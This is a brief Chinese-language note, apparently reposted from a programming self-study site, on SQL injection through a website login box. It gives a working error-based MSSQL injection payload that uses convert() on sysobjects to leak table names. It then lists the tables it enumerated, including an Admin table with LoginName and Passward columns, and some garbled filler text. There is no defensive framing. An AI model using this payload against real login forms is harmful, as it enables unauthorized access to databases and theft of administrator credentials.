1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U')) and '1'='1
首先:select top 1 name form sysobjects where xtype='U'用来查 数据库 中的用户表
说明存在sysdiagrams 这个表
sysdiagrams
表:Commonness
表:Bargain
表:ValidationReport
表:Examine
表:OpinionBook
表:ProjectInformation
表:Company
表:yinfu
表:NewsType
表:AdminType
表:Admin
列:ID HdhCmsTest2cto测试数据
列:LoginName
列:Passward
admin
查看更多关于登录框注入笔记 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13290